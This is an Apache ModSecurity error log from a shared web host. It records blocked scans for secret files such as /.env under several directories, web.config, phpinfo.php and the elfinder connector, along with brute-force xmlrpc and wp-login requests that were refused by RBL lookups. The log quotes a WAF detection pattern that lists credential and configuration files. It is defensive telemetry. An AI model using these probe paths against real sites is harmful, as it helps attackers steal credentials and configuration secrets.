[Tue May 26 13:46:48.941406 2026] [security2:error] [pid 555743:tid 555873] [client 194.59.31.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVW8MjqAquC0YaxQjCgLwAAAQo"]
[Tue May 26 13:46:48.941795 2026] [security2:error] [pid 555743:tid 555899] [client 69.58.72.214:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVW78jqAquC0YaxQjCf2gAAASQ"], referer: https://www.anujtradingco.com/
[Tue May 26 13:46:48.942556 2026] [security2:error] [pid 555743:tid 555941] [client 194.59.31.115:57331] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "ahVW8MjqAquC0YaxQjCgIQABTlg"]
[Tue May 26 13:46:49.382136 2026] [security2:error] [pid 544395:tid 544541] [client 104.252.191.170:50174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVW8Rmrs7g3RMCdp8XrhgAAABA"]
[Tue May 26 13:46:49.840636 2026] [security2:error] [pid 544395:tid 544538] [client 106.192.248.115:58949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVW8Rmrs7g3RMCdp8XrrAAAAA0"]
[Tue May 26 13:46:49.840750 2026] [security2:error] [pid 544395:tid 544538] [client 106.192.248.115:58949] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVW8Rmrs7g3RMCdp8XrrAAAAA0"]
[Tue May 26 13:46:49.884947 2026] [security2:error] [pid 555743:tid 555910] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW8cjqAquC0YaxQjCgTAAAAS8"]
[Tue May 26 13:46:50.373021 2026] [security2:error] [pid 544395:tid 544602] [client 69.58.72.214:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVW8hmrs7g3RMCdp8XrvAAAAE0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1459573&moderation-hash=a0c2ce51d2027b99fd182cadff5aecaf
[Tue May 26 13:46:50.570511 2026] [security2:error] [pid 555743:tid 555956] [client 4.201.75.230:56262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deepakrohilla.com.md-74.webhostbox.net"] [uri "/function/function.php"] [unique_id "ahVW8sjqAquC0YaxQjCgkgAAAV0"]
[Tue May 26 13:46:51.737387 2026] [security2:error] [pid 544395:tid 544647] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW8xmrs7g3RMCdp8XrywAAAHo"]
[Tue May 26 13:46:53.642775 2026] [proxy:error] [pid 555743:tid 555895] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:46:53.642834 2026] [proxy_http:error] [pid 555743:tid 555895] [client 205.210.31.77:60144] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:46:53.643401 2026] [proxy:error] [pid 555743:tid 555895] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:46:53.643432 2026] [proxy_http:error] [pid 555743:tid 555895] [client 205.210.31.77:60144] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:46:54.015414 2026] [security2:error] [pid 555743:tid 555889] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW9cjqAquC0YaxQjCgrgAAARo"]
[Tue May 26 13:46:54.175502 2026] [security2:error] [pid 544395:tid 544615] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVW9hmrs7g3RMCdp8XsAwAAAFo"]
[Tue May 26 13:46:54.585253 2026] [security2:error] [pid 555743:tid 555924] [client 129.222.147.134:29906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVW9sjqAquC0YaxQjCgwwAAAT0"]
[Tue May 26 13:46:54.585411 2026] [security2:error] [pid 555743:tid 555924] [client 129.222.147.134:29906] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVW9sjqAquC0YaxQjCgwwAAAT0"]
[Tue May 26 13:46:54.728857 2026] [security2:error] [pid 555743:tid 555878] [client 69.58.72.214:43901] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVW9sjqAquC0YaxQjCgvgAAAQ8"], referer: https://anujtradingco.com
[Tue May 26 13:46:55.337775 2026] [security2:error] [pid 555743:tid 555986] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW9sjqAquC0YaxQjCgyQAAAXs"]
[Tue May 26 13:46:56.413369 2026] [autoindex:error] [pid 555743:tid 555981] [client 198.235.24.183:60662] AH01276: Cannot serve directory /home2/svijakqj/dglmmm.org.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:46:56.568856 2026] [security2:error] [pid 555743:tid 555873] [client 4.201.75.230:5637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/cache.php"] [unique_id "ahVW-MjqAquC0YaxQjCg4gAAAQo"]
[Tue May 26 13:46:57.296765 2026] [security2:error] [pid 555743:tid 555912] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW-MjqAquC0YaxQjCg6wAAATE"]
[Tue May 26 13:46:58.378103 2026] [security2:error] [pid 555743:tid 555926] [client 75.236.181.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW-cjqAquC0YaxQjCg-wAAAT8"]
[Tue May 26 13:46:59.421196 2026] [security2:error] [pid 544395:tid 544624] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW-hmrs7g3RMCdp8XsOgAAAGM"]
[Tue May 26 13:46:59.976534 2026] [security2:error] [pid 555743:tid 555888] [client 4.201.75.230:5681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/themes.php"] [unique_id "ahVW-8jqAquC0YaxQjChHAAAARk"]
[Tue May 26 13:47:00.463894 2026] [security2:error] [pid 555743:tid 555955] [client 106.192.248.115:59267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVW_MjqAquC0YaxQjChKgAAAVw"]
[Tue May 26 13:47:00.463995 2026] [security2:error] [pid 555743:tid 555955] [client 106.192.248.115:59267] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVW_MjqAquC0YaxQjChKgAAAVw"]
[Tue May 26 13:47:01.375797 2026] [security2:error] [pid 555743:tid 555970] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW_MjqAquC0YaxQjChNAAAAWs"]
[Tue May 26 13:47:01.405276 2026] [security2:error] [pid 544395:tid 544477] [remote 45.79.189.31:37680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVW_Rmrs7g3RMCdp8XsVQAABFE"]
[Tue May 26 13:47:01.859112 2026] [security2:error] [pid 555743:tid 555751] [remote 173.249.21.166:52440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVW_cjqAquC0YaxQjChRgABdQc"]
[Tue May 26 13:47:02.768485 2026] [security2:error] [pid 555743:tid 555845] [remote 103.95.119.103:53804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVW_sjqAquC0YaxQjChVwABTmU"]
[Tue May 26 13:47:02.861381 2026] [security2:error] [pid 555743:tid 555933] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW_sjqAquC0YaxQjChVQAAAUY"]
[Tue May 26 13:47:04.437587 2026] [security2:error] [pid 544395:tid 544649] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW_xmrs7g3RMCdp8XscgAAAHw"]
[Tue May 26 13:47:04.608673 2026] [security2:error] [pid 544395:tid 544603] [client 129.222.147.134:5699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXABmrs7g3RMCdp8XsegAAAE4"]
[Tue May 26 13:47:04.616889 2026] [security2:error] [pid 544395:tid 544603] [client 129.222.147.134:5699] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXABmrs7g3RMCdp8XsegAAAE4"]
[Tue May 26 13:47:04.781463 2026] [security2:error] [pid 555743:tid 555846] [remote 109.205.180.55:49178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVXAMjqAquC0YaxQjChdwABdGY"]
[Tue May 26 13:47:05.173269 2026] [security2:error] [pid 555743:tid 555883] [client 4.201.75.230:5470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/an.php"] [unique_id "ahVXAcjqAquC0YaxQjChegAAARQ"]
[Tue May 26 13:47:06.286130 2026] [security2:error] [pid 544395:tid 544548] [client 4.201.75.230:5471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/index/function.php"] [unique_id "ahVXAhmrs7g3RMCdp8XsiQAAABc"]
[Tue May 26 13:47:06.791310 2026] [security2:error] [pid 555743:tid 555879] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXAsjqAquC0YaxQjChigAAARA"]
[Tue May 26 13:47:08.713769 2026] [security2:error] [pid 555743:tid 555916] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXBMjqAquC0YaxQjChnwAAATU"]
[Tue May 26 13:47:10.171417 2026] [security2:error] [pid 555743:tid 555889] [client 45.148.10.159:49582] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/.env"] [unique_id "ahVXBsjqAquC0YaxQjChugAAARo"]
[Tue May 26 13:47:10.454897 2026] [security2:error] [pid 555743:tid 555912] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXBsjqAquC0YaxQjChwAAAATE"]
[Tue May 26 13:47:10.785812 2026] [security2:error] [pid 555743:tid 555909] [client 128.140.106.114:16938] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVXBsjqAquC0YaxQjChxwAAAS4"], referer: https://thegoodsporting.com
[Tue May 26 13:47:10.939700 2026] [security2:error] [pid 555743:tid 555906] [client 106.192.248.115:17659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXBsjqAquC0YaxQjChyQAAASs"]
[Tue May 26 13:47:10.939847 2026] [security2:error] [pid 555743:tid 555906] [client 106.192.248.115:17659] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXBsjqAquC0YaxQjChyQAAASs"]
[Tue May 26 13:47:11.154297 2026] [security2:error] [pid 555743:tid 555893] [client 45.148.10.159:49582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/phpinfo.php"] [unique_id "ahVXB8jqAquC0YaxQjChzwAAAR4"]
[Tue May 26 13:47:11.639143 2026] [ssl:error] [pid 544395:tid 544638] [client 98.88.137.2:16563] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpcontacts.azurmediatec.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:47:11.852710 2026] [security2:error] [pid 544395:tid 544533] [client 4.201.75.230:5493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/ws.php"] [unique_id "ahVXBxmrs7g3RMCdp8XszwAAAAg"]
[Tue May 26 13:47:11.946363 2026] [security2:error] [pid 544395:tid 544609] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXBxmrs7g3RMCdp8XsyQAAAFQ"]
[Tue May 26 13:47:12.357946 2026] [security2:error] [pid 555743:tid 555973] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXB8jqAquC0YaxQjCh4AAAAW4"]
[Tue May 26 13:47:13.184776 2026] [security2:error] [pid 555743:tid 555998] [client 45.148.10.159:49590] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/portal/.env"] [unique_id "ahVXCcjqAquC0YaxQjCh8gAAAYc"]
[Tue May 26 13:47:13.401969 2026] [security2:error] [pid 555743:tid 555894] [client 45.148.10.159:49590] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/env/.env"] [unique_id "ahVXCcjqAquC0YaxQjCh-AAAAR8"]
[Tue May 26 13:47:14.804916 2026] [security2:error] [pid 544395:tid 544528] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXChmrs7g3RMCdp8Xs4QAAAAM"]
[Tue May 26 13:47:14.832865 2026] [security2:error] [pid 555743:tid 555874] [client 129.222.147.134:25236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXCsjqAquC0YaxQjCiFQAAAQs"]
[Tue May 26 13:47:14.846108 2026] [security2:error] [pid 555743:tid 555874] [client 129.222.147.134:25236] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXCsjqAquC0YaxQjCiFQAAAQs"]
[Tue May 26 13:47:15.113606 2026] [security2:error] [pid 555743:tid 555978] [client 4.201.75.230:5486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/404.php"] [unique_id "ahVXC8jqAquC0YaxQjCiFwAAAXM"]
[Tue May 26 13:47:15.332457 2026] [security2:error] [pid 555743:tid 555976] [client 45.148.10.159:49598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/api/.env"] [unique_id "ahVXC8jqAquC0YaxQjCiHwAAAXE"]
[Tue May 26 13:47:15.582816 2026] [security2:error] [pid 555743:tid 555944] [client 45.148.10.159:49598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/app/.env"] [unique_id "ahVXC8jqAquC0YaxQjCiIQAAAVE"]
[Tue May 26 13:47:15.766398 2026] [security2:error] [pid 555743:tid 555973] [client 64.89.161.160:60273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.161.89.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "juniorwoodies.com"] [uri "/assets/admin/plugins/elfinder/connectors/php/connector.php"] [unique_id "ahVXC8jqAquC0YaxQjCiJwAAAW4"]
[Tue May 26 13:47:15.822130 2026] [security2:error] [pid 555743:tid 555884] [client 45.148.10.159:49598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/dev/.env"] [unique_id "ahVXC8jqAquC0YaxQjCiKAAAARU"]
[Tue May 26 13:47:16.054727 2026] [security2:error] [pid 555743:tid 555964] [client 45.148.10.159:49598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/new/.env"] [unique_id "ahVXDMjqAquC0YaxQjCiLgAAAWU"]
